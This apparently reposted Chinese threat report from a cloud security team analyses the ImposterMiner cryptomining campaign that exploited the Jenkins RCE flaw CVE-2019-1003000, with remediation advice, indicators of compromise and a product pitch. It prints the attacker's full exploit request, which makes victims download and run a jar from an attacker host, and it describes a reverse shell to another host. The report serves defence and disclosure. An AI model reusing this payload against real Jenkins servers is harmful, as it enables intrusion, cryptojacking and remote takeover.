簡介

阿里云安全于近日捕獲到一起使用Jenkins RCE漏洞進行攻擊的挖礦事件。除挖礦外，攻擊者還曾植入具有C&C功能的tsunami木馬，也預留了反彈shell的功能，給用戶帶來極大安全隱患。

由于攻擊者直接復制了Jenkins系列漏洞發現者（Orange.tw）在博客上公布的poc，攻擊payload含有"Orange.tw"字樣，可能被誤認為是漏洞發現者在進行測試，因此我們將木馬命名為ImposterMiner（冒充者）。

本次事件具有兩個特點：一是ImposterMiner木馬開始爆發的時間距離Jenkins漏洞利用方法公開的時間極短，僅相隔2天；二是僅靠web漏洞直接入侵，不具有蠕蟲傳染性。這兩點與不久前利用Nexus Repository Manager 3新漏洞進行攻擊的watchbog挖礦木馬事件較為相似。

本文將分析ImposterMiner挖礦木馬的結構，并就如何清理、預防類似挖礦木馬給出安全建議。

ImposterMiner挖礦木馬分析

上圖展示了ImposterMiner挖礦木馬的感染流程。攻擊者首先使用如下payload攻擊jenkins服務

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27orange.tw%27,%20root=%27http://45.55.211.79/%27)%0a@Grab(group=%27tw.orange%27,%20module=%27poc%27,%20version=%278%27)%0aimport%20Orange; HTTP/1.1 Host:【victim_host】:【jenkins_port】

該payload使用了CVE-2019-1003000這個jenkins RCE（遠程命令執行）漏洞，導致受害主機請求http://45.55.211.79/tw/orange/poc/8/poc-8.jar文件，并在本地執行。這里不難發現，攻擊者只是簡單修改了漏洞發現者博客上公開的代碼，因而直接以orange.tw（漏洞發現者的名字）和poc(Proof of Concept，能夠證明漏洞存在的代碼，通常點到為止不造成實際損害)作為項目和模塊名，乍看之下，非常容易將此次攻擊誤認為漏洞作者進行的無害的安全測試。

poc-8.jar的代碼如下

其中請求的http://45.55.211.79/.cache/jenkins/n2.sh腳本，將會創建/tmp/.scr文件夾，并請求下載45.55.211.79/.cache/jenkins/s.tar.gz：

解壓s.tar.gz得到如下左圖所示文件夾，并運行右圖中的go腳本，根據當前機器的架構，選擇運行i686或x86_64。

i686和x86_64這兩個程序都是xmrig改寫而成的礦機，主要在nanopool.com礦池進行挖礦。它們還會將自身寫入crontab文件，每分鐘執行，進行持久化，此處不再贅述。

此外，45.55.211.79服務器上存有多種歷史上曾經使用，或尚未啟用的payload。

例如3月7日，阿里云安全曾捕獲到攻擊者使用圖中文件夾poc/5/poc-5.jar中的payload，會導致被入侵主機下載解壓并運行http://45.55.211.79/.cache/jenkins/jks.tar.gz。該壓縮包中包括tsunami木馬變種，能夠通過IRC接收下發指令并執行各種攻擊，如下圖所示。

又例如http://45.55.211.79/.cache/jenkins/jen.pl會使被入侵主機反彈shell到190.121.18.164:1090

以上這些惡意文件的最后修改日期說明ImposterMiner的作者依然在頻繁進行更新，同時還說明作者并不滿足于在受害者主機上安靜挖礦，而是時刻準備著將受害主機用作ddos肉雞，或使用shell對主機進行任意操縱。

影響范圍

根據阿里云安全監控到的入侵趨勢（如下圖），ImposterMiner挖礦木馬從漏洞公布后僅兩天（2月21日）就開始利用其進行攻擊和挖礦，給用戶留下的修復時間窗口非常小。

攻擊數量于3月3日左右達到最高峰，并且至今仍保持著較高的水平。

攻擊趨勢示意攻擊趨勢示意

ImposterMiner惡意挖礦木馬當前使用的錢包地址為：42X5Nwfs6kPcK5xZaV1mxnLpSqYst9d46Dx63tdtmHFZWdWPryNt5ZhZXFXLYm2yZLZt7xXC5zerGbqQi2X1MsTzA9whw2X

從礦池數據看出，該地址HashRate波動較大，最高時達到236KH/s，平均值在150KH/s左右，可能已有1~2萬臺服務器被入侵挖礦。該錢包地址累計收益為169門羅幣左右，約合9120美元。

除了上述地址外，攻擊者還使用過至少一個不同的錢包地址：4B6GzzkQBgqbMraFa2FMnk4jKzFvxcqGNApKn6AK91R6KFgiWDKzhgWS864egV4HuHetns7yfYP9NDq234yxfNKEJWR4ga5。

安全建議

Jenkins作為最受歡迎的持續集成(CI)工具，使用量很大。上一次Jenkins遠程命令執行漏洞(CVE-2017-1000353)的曝光，導致了“史上最大規模挖礦事件之一”，攻擊者收益逾300萬美元。

因此，Jenkins漏洞可能造成影響的范圍巨大。這也導致逐利的攻擊者對Jenkins虎視眈眈，一有新的漏洞便迅速加以利用；這次RCE漏洞從公開到開始被黑產利用僅花了2天，就是很好的證明。

針對此次安全事件，阿里云安全給出以下預防和清理建議：

用戶應及時升級包括Jenkins在內的各種軟件，避免遭受類似此次ImposterMiner挖礦木馬以Jenkins作為入口的攻擊，導致生產系統的其他部分一并淪陷。懷疑已經受到感染的用戶，可自查主機是否存在/tmp/.scr惡意目錄，并根據自身情況考慮清空/tmp目錄；使用ps命令查看是否存在名為"-bash"惡意進程；自查并清理crontab相關文件。

建議使用阿里云安全的下一代云防火墻產品，其阻斷惡意外聯、能夠配置智能策略的功能，能夠有效幫助防御入侵。哪怕攻擊者在主機上的隱藏手段再高明，下載、挖礦、反彈shell這些操作，都需要進行惡意外聯；云防火墻的攔截將徹底阻斷攻擊鏈。此外，用戶還可以通過自定義策略，直接屏蔽惡意網站，達到阻斷入侵的目的。

對于有更高定制化要求的用戶，可以考慮使用阿里云安全管家服務。購買服務后將有經驗豐富的安全專家提供咨詢服務，定制適合您的方案，幫助加固系統，預防入侵。入侵事件發生后，也可介入直接協助入侵后的清理、事件溯源等，適合有較高安全需求的用戶，或未雇傭安全工程師，但希望保障系統安全的企業。

IOC

錢包地址：
4B6GzzkQBgqbMraFa2FMnk4jKzFvxcqGNApKn6AK91R6KFgiWDKzhgWS864egV4HuHetns7yfYP9NDq234yxfNKEJWR4ga5
42X5Nwfs6kPcK5xZaV1mxnLpSqYst9d46Dx63tdtmHFZWdWPryNt5ZhZXFXLYm2yZLZt7xXC5zerGbqQi2X1MsTzA9whw2X

礦池地址：
https://www.supportxmr.com
https://xmr.nanopool.org

惡意程序：

惡意url：
http://45.55.211.79/.cache/jenkins/
http://45.55.211.79/tw/orange/poc/

惡意主機：
190.121.18.164

Reference
http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/

?

---

本文作者：云安全專家

原文鏈接

本文為云棲社區原創內容，未經允許不得轉載。

總結

以上是生活随笔為你收集整理的威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿木马新“跳板”的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。